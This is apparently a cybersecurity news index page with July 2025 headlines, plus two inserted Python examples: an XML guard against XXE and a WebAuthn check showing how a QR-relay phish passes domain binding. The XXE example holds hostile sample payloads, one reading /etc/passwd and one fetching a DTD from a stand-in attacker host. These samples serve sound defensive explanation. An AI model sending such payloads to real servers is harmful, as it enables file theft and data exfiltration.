The Hacker News | #1 Trusted Source for Cybersecurity News — Index Page

CISA Orders Urgent Patching After Chinese Hackers Exploit SharePoint Flaws in Live Attacks

Jul 23, 2025 Vulnerability / Threat Intelligence
The U.S. Cybersecurity and Infrastructure Security Agency (CISA), on July 22, 2025, added two Microsoft SharePoint flaws, CVE-2025-49704 and CVE-2025-49706, to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. To that end, Federal Civilian Executive Branch (FCEB) agencies are required to remediate the identified vulnerabilities by July 23, 2025. "CISA is aware of active exploitation of a spoofing and RCE vulnerability chain involving CVE-2025-49706 and CVE-2025-49704, enabling unauthorized access to on-premise SharePoint servers," the agency said in an updated advisory. The inclusion of the two shortcomings, a spoofing vulnerability and a remote code execution vulnerability collectively tracked as ToolShell, in the KEV catalog comes after Microsoft revealed that Chinese hacking groups like Linen Typhoon and Violet Typhoon have leveraged these flaws to breach on-premises SharePoint servers since July 7, 2025. As of writing, the tech...
CISA Warns: SysAid Flaws Under Active Attack Enable Remote File Access and SSRF

Jul 23, 2025 Vulnerability / Software Security
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added two security flaws impacting SysAid IT support software to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerabilities in question are listed below -

- CVE-2025-2775 (CVSS score: 9.3) - An improper restriction of XML external entity (XXE) reference vulnerability in the Checkin processing functionality, allowing for administrator account takeover and file read primitives
- CVE-2025-2776 (CVSS score: 9.3) - An improper restriction of XML external entity (XXE) reference vulnerability in the Server URL processing functionality, allowing for administrator account takeover and file read primitives

Both shortcomings were disclosed by watchTowr Labs researchers Sina Kheirkhah and Jake Knott back in May, alongside CVE-2025-2777 (CVSS score: 9.3), a pre-authenticated XXE within the /lshw endpoint. The three vulnerabilities were addressed by SysAid in the on-pre...
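All three SysAid bugs are the same class: an XML endpoint whose parser honours a DOCTYPE, so an attacker-supplied entity declaration turns "parse this request" into "read this file". The guard below is an added illustration, not SysAid's code (SysAid is a Java product; this is Python, and the check-in element names, file paths and attacker host are assumptions made up for the example). It shows the hardening a practitioner wants in front of any XML parser that resolves entities by default: refuse the document before it reaches the parser if it declares a DTD at all, since a legitimate agent check-in has no reason to carry one and every XXE variant, including out-of-band parameter-entity tricks and entity-expansion DoS, needs one.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample requests for a hypothetical agent check-in endpoint.
# They are not SysAid traffic and are not taken from the watchTowr write-up.
BENIGN_CHECKIN = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<checkin><agent>host-01</agent><version>1.2.3</version></checkin>'
)
XXE_CHECKIN = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<!DOCTYPE checkin [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b'<checkin><agent>&xxe;</agent><version>1.2.3</version></checkin>'
)
# Same goal via an external DTD fetched from an attacker host (out-of-band XXE).
OOB_XXE_CHECKIN = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE checkin SYSTEM "http://attacker.invalid/evil.dtd">'
    b'<checkin><agent>host-01</agent></checkin>'
)

_DTD_MARKER = re.compile(rb"<!\s*(DOCTYPE|ENTITY)", re.IGNORECASE)


class UnsafeXML(ValueError):
    """Raised when a document is refused before it reaches the parser."""


def reject_dtd(data: bytes) -> bytes:
    """Refuse any document that declares a DTD.

    Internal, external and parameter entities all require a DOCTYPE, and so
    does billion-laughs style expansion, so rejecting the declaration closes
    the whole class. The scan runs on raw bytes, so documents in a multi-byte
    encoding that could hide the marker from a byte search are refused rather
    than decoded and trusted.
    """
    if data.startswith((b"\xff\xfe", b"\xfe\xff")) or b"\x00" in data[:256]:
        raise UnsafeXML("only UTF-8 documents are accepted")
    if _DTD_MARKER.search(data):
        raise UnsafeXML("DOCTYPE/ENTITY declarations are not allowed")
    return data


def parse_checkin(data: bytes) -> dict:
    """Parse a check-in body into {child tag: text}, with the DTD guard in front."""
    root = ET.fromstring(reject_dtd(data))
    if root.tag != "checkin":
        raise UnsafeXML(f"unexpected root element {root.tag!r}")
    return {child.tag: (child.text or "") for child in root}


def is_accepted(data: bytes) -> bool:
    """True if the document passes the guard and parses, False if it is refused."""
    try:
        parse_checkin(data)
        return True
    except UnsafeXML:
        return False


if __name__ == "__main__":
    print(parse_checkin(BENIGN_CHECKIN))
    for sample in (XXE_CHECKIN, OOB_XXE_CHECKIN):
        try:
            parse_checkin(sample)
        except UnsafeXML as exc:
            print("refused:", exc)
```

CPython's xml.etree does not resolve external entities on its own, so the guard is belt-and-braces here; it matters for parsers that do resolve them by default, such as lxml or a JAXP DocumentBuilderFactory in Java, where the equivalent is enabling the http://apache.org/xml/features/disallow-doctype-decl feature before parsing untrusted input.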
Microsoft Links Ongoing SharePoint Exploits to Three Chinese Hacker Groups

Jul 22, 2025 Vulnerability / Threat Intelligence
Microsoft has formally tied the exploitation of security flaws in internet-facing SharePoint Server instances to two Chinese hacking groups called Linen Typhoon and Violet Typhoon as early as July 7, 2025, corroborating earlier reports. The tech giant said it also observed a third China-based threat actor, which it tracks as Storm-2603, weaponizing the flaws to obtain initial access to target organizations. "With the rapid adoption of these exploits, Microsoft assesses with high confidence that threat actors will continue to integrate them into their attacks against unpatched on-premises SharePoint systems," the tech giant said in a report published today. A brief description of the threat activity clusters is below -

- Linen Typhoon (aka APT27, Bronze Union, Emissary Panda, Iodine, Lucky Mouse, Red Phoenix, and UNC215), which has been active since 2012 and has previously been linked to malware families like SysUpdate, HyperBro, and PlugX
- Violet Typhoon (aka ...
Cisco Confirms Active Exploits Targeting ISE Flaws Enabling Unauthenticated Root Access

Jul 22, 2025 Network Security / Vulnerability
Cisco on Monday updated its advisory for a set of recently disclosed security flaws in Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC) to acknowledge active exploitation. "In July 2025, the Cisco PSIRT [Product Security Incident Response Team], became aware of attempted exploitation of some of these vulnerabilities in the wild," the company said in an alert. The network equipment vendor did not disclose which vulnerabilities have been weaponized in real-world attacks, the identity of the threat actors exploiting them, or the scale of the activity. Cisco ISE plays a central role in network access control, managing which users and devices are allowed onto corporate networks and under what conditions. A compromise at this layer could give attackers unrestricted access to internal systems, bypassing authentication controls and logging mechanisms—turning a policy engine into an open door. The vulnerabilities outlined in the alert are all critical-ra...
Credential Theft and Remote Access Surge as AllaKore, PureRAT, and Hijack Loader Proliferate

Jul 22, 2025 Financial Fraud / Malware
Threat actors are still targeting Mexican organizations to deliver a modified version of AllaKore RAT and SystemBC as part of a long-running campaign. The activity has been attributed by Arctic Wolf Labs to a financially motivated hacking group called Greedy Sponge. It's believed to have been active since early 2021, indiscriminately targeting a wide range of sectors, such as retail, agriculture, public sector, entertainment, manufacturing, transportation, commercial services, capital goods, and banking. "The AllaKore RAT payload has been heavily modified to enable the threat actors to send select banking credentials and unique authentication information back to their command-and-control (C2) server, for the purpose of conducting financial fraud," the cybersecurity company said in an analysis published last week. Details of the campaign were first documented by the BlackBerry Research and Intelligence Team (which is now part of Arctic Wolf) in January 2024, with ...
How to Advance from SOC Manager to CISO?

Jul 22, 2025 Cybersecurity / Leadership
Making the move from managing a security operations center (SOC) to being a chief information security officer (CISO) is a significant career leap. Not only do you need a solid foundation of technical knowledge but also leadership skills and business acumen. This article will guide you through the practical steps and skills you'll need to land an executive cybersecurity job and make the promotion from SOC manager to CISO a reality. Is the CISO role right for you? It's always a good idea to think about how you could move up and grow in your career. Aspiring to be a CISO can be a great career move. Additionally, certain operational tasks in cybersecurity, especially in a SOC, are becoming increasingly automated, making it vital to develop strategic and leadership skills to stay ahead. Having ambitious goals helps you, as a SOC analyst or lead, stay relevant and valuable in what is a constantly changing field. However, the role of CISO is significantly different from other rol...
Hackers Exploit SharePoint Zero-Day Since July 7 to Steal Keys, Maintain Persistent Access

Jul 22, 2025 Vulnerability / Threat Intelligence
The recently disclosed critical Microsoft SharePoint vulnerability has been under exploitation as early as July 7, 2025, according to findings from Check Point Research. The cybersecurity company said it observed first exploitation attempts targeting an unnamed major Western government, with the activity intensifying on July 18 and 19, spanning government, telecommunications, and software sectors in North America and Western Europe. Check Point also said the exploitation efforts originated from three different IP addresses – 104.238.159[.]149, 107.191.58[.]76, and 96.9.125[.]147 – one of which was previously tied to the weaponization of security flaws in Ivanti Endpoint Manager Mobile (EPMM) appliances ( CVE-2025-4427 and CVE-2025-4428 ). "We're witnessing an urgent and active threat: a critical zero-day in SharePoint on-prem is being exploited in the wild, putting thousands of global organizations at risk," Lotem Finkelstein, Director of Threat Intelligence at Chec...
Iran-Linked DCHSpy Android Malware Masquerades as VPN Apps to Spy on Dissidents

Jul 21, 2025 Spyware / Mobile Security
Cybersecurity researchers have unearthed new Android spyware artifacts that are likely affiliated with the Iranian Ministry of Intelligence and Security (MOIS) and have been distributed to targets by masquerading as VPN apps and Starlink, a satellite internet connection service offered by SpaceX. Mobile security vendor Lookout said it discovered four samples of a surveillanceware tool it tracks as DCHSpy one week after the onset of the Israel-Iran conflict last month. Exactly how many people may have installed these apps is not clear. "DCHSpy collects WhatsApp data, accounts, contacts, SMS, files, location, and call logs, and can record audio and take photos," security researchers Alemdar Islamoglu and Justin Albrecht said. First detected in July 2024, DCHSpy is assessed to be the handiwork of MuddyWater, an Iranian nation-state group tied to MOIS. The hacking crew is also called Boggy Serpens, Cobalt Ulster, Earth Vetala, ITG17, Mango Sandstorm (formerly Mercury), Se...
China-Linked Hackers Launch Targeted Espionage Campaign on African IT Infrastructure

Jul 21, 2025 Browser Security / Malware
The China-linked cyber espionage group tracked as APT41 has been attributed to a new campaign targeting government IT services in the African region. "The attackers used hardcoded names of internal services, IP addresses, and proxy servers embedded within their malware," Kaspersky researchers Denis Kulik and Daniil Pogorelov said. "One of the C2s [command-and-control servers] was a captive SharePoint server within the victim's infrastructure." APT41 is the moniker assigned to a prolific Chinese nation-state hacking group that's known for targeting organizations spanning multiple sectors, including telecom and energy providers, educational institutions, healthcare organizations and IT energy companies in more than three dozen countries. What makes the campaign noteworthy is its focus on Africa, which, as the Russian cybersecurity vendor noted, "had experienced the least activity" from this specific threat actor. That said, the findings line u...
⚡ Weekly Recap: SharePoint 0-Day, Chrome Exploit, macOS Spyware, NVIDIA Toolkit RCE and More

Jul 21, 2025 Enterprise Security / Zero Day
Even in well-secured environments, attackers are getting in—not with flashy exploits, but by quietly taking advantage of weak settings, outdated encryption, and trusted tools left unprotected. These attacks don't depend on zero-days. They work by staying unnoticed—slipping through the cracks in what we monitor and what we assume is safe. What once looked suspicious now blends in, thanks to modular techniques and automation that copy normal behavior. The real concern? Control isn't just being challenged—it's being quietly taken. This week's updates highlight how default settings, blurred trust boundaries, and exposed infrastructure are turning everyday systems into entry points. ⚡ Threat of the Week Critical SharePoint Zero-Day Actively Exploited (Patch Released Today) — Microsoft has released fixes to address two security flaws in SharePoint Server that have come under active exploitation in the wild to breach dozens of organizations across the world. Details of exploitation emer...
Assessing the Role of AI in Zero Trust

Jul 21, 2025 Artificial Intelligence / Zero Trust
By 2025, Zero Trust has evolved from a conceptual framework into an essential pillar of modern security. No longer merely theoretical, it's now a requirement that organizations must adopt. A robust, defensible architecture built on Zero Trust principles does more than satisfy baseline regulatory mandates. It underpins cyber resilience, secures third-party partnerships, and ensures uninterrupted business operations. Indeed, more than 80% of organizations plan to implement Zero Trust strategies by 2026, according to a recent Zscaler report. In the context of Zero Trust, artificial intelligence (AI) can assist greatly as a tool for implementing automation around adaptive trust and continuous risk evaluation. In a Zero Trust architecture, access decisions must adapt continuously to changing factors such as device posture, user behavior, location, workload sensitivity, and more. This constant evaluation generates massive volumes of data, far beyond what human teams can process alo...
PoisonSeed Hackers Bypass FIDO Keys Using QR Phishing and Cross-Device Sign-In Abuse

Jul 21, 2025 Threat Intelligence / Authentication
Cybersecurity researchers have disclosed a novel attack technique that allows threat actors to downgrade Fast IDentity Online (FIDO) key protections by deceiving users into approving authentication requests from spoofed company login portals. FIDO keys are hardware- or software-based authenticators designed to eliminate phishing by binding logins to specific domains using public-private key cryptography. In this case, attackers exploit a legitimate feature—cross-device sign-in—to trick victims into unknowingly authenticating malicious sessions. The activity, observed by Expel as part of a phishing campaign in the wild, has been attributed to a threat actor named PoisonSeed, which was recently flagged as leveraging compromised credentials associated with customer relationship management (CRM) tools and bulk email providers to send spam messages containing cryptocurrency seed phrases and drain victims' digital wallets. "The attacker does this by taking advantage of cross-d...
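The "binding logins to specific domains" that makes FIDO phishing-resistant is enforced by two fields the relying party checks on every assertion: the origin the browser writes into clientDataJSON, and the SHA-256 of the RP ID at the front of authenticatorData. The example below is an added illustration, not Expel's code or any vendor's implementation; the relying party name, origins and challenge values are assumptions made up for it, and the ECDSA signature check is left out because the Python standard library has no ECDSA (a production RP would use a WebAuthn library). It shows why a classic look-alike page fails those checks, and why a cross-device (QR) relay of the kind described above passes them: the attacker's own browser is the client sitting on the real origin, so everything the RP can see is legitimate.

```python
import base64
import hashlib
import json
import os
import struct

# Hypothetical relying party; these names are assumptions for the illustration.
RP_ID = "login.example.com"
EXPECTED_ORIGIN = "https://login.example.com"
PHISHING_ORIGIN = "https://login-example.com.invalid"

FLAG_UP = 0x01  # user present
FLAG_UV = 0x04  # user verified


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def new_challenge() -> bytes:
    return os.urandom(32)


def make_client_data(origin: str, challenge: bytes) -> bytes:
    """clientDataJSON as the *browser* produces it for navigator.credentials.get().

    The page's JavaScript cannot choose 'origin'; the browser fills it in, which is
    why a credential scoped to RP_ID is useless to a look-alike domain."""
    return json.dumps({
        "type": "webauthn.get",
        "challenge": b64url(challenge),
        "origin": origin,
        "crossOrigin": False,
    }).encode()


def make_authenticator_data(rp_id: str, user_verified: bool = True, sign_count: int = 1) -> bytes:
    """authenticatorData = SHA-256(rpId) || flags || signCount (32 + 1 + 4 bytes)."""
    flags = FLAG_UP | (FLAG_UV if user_verified else 0)
    return hashlib.sha256(rp_id.encode()).digest() + bytes([flags]) + struct.pack(">I", sign_count)


def verify_assertion(client_data_json: bytes, auth_data: bytes, expected_challenge: bytes,
                     rp_id: str = RP_ID, expected_origin: str = EXPECTED_ORIGIN) -> dict:
    """The relying party's domain-binding checks on an assertion.

    Signature verification (over authData || SHA-256(clientDataJSON) with the
    credential's stored public key) is omitted: no ECDSA in the standard library."""
    try:
        cd = json.loads(client_data_json)
    except ValueError:
        return {"ok": False, "reason": "clientDataJSON is not JSON"}
    if cd.get("type") != "webauthn.get":
        return {"ok": False, "reason": "wrong ceremony type"}
    if cd.get("challenge") != b64url(expected_challenge):
        return {"ok": False, "reason": "challenge mismatch (replay or wrong session)"}
    if cd.get("origin") != expected_origin:
        return {"ok": False, "reason": "origin mismatch"}
    if len(auth_data) < 37:
        return {"ok": False, "reason": "authenticatorData too short"}
    if auth_data[:32] != hashlib.sha256(rp_id.encode()).digest():
        return {"ok": False, "reason": "rpIdHash mismatch"}
    flags = auth_data[32]
    if not flags & FLAG_UP:
        return {"ok": False, "reason": "user presence not asserted"}
    return {
        "ok": True,
        "reason": "domain-binding checks passed",
        "user_verified": bool(flags & FLAG_UV),
        "sign_count": struct.unpack(">I", auth_data[33:37])[0],
    }


def direct_phish_outcome() -> dict:
    """Classic phishing: the victim's browser sits on the look-alike origin, so even
    an assertion that somehow reached the RP carries the wrong origin."""
    ch = new_challenge()
    return verify_assertion(make_client_data(PHISHING_ORIGIN, ch), make_authenticator_data(RP_ID), ch)


def cross_device_relay_outcome() -> dict:
    """QR relay: the attacker's own browser starts a real login on EXPECTED_ORIGIN and
    picks cross-device sign-in; the victim scans the relayed QR code with a phone
    that holds a credential for RP_ID. Origin and rpIdHash are both genuine, so the
    RP accepts the assertion and the attacker's browser receives the session."""
    ch = new_challenge()  # issued by the real RP to the attacker's session
    return verify_assertion(make_client_data(EXPECTED_ORIGIN, ch), make_authenticator_data(RP_ID), ch)


if __name__ == "__main__":
    print("direct phish:", direct_phish_outcome())
    print("cross-device relay:", cross_device_relay_outcome())
```

The point of the second scenario is that nothing in the assertion distinguishes the relay from a legitimate cross-device login; the RP's cryptographic checks are doing exactly what they were designed to do, and the weakness sits in the user being persuaded to scan a QR code for a session they did not start.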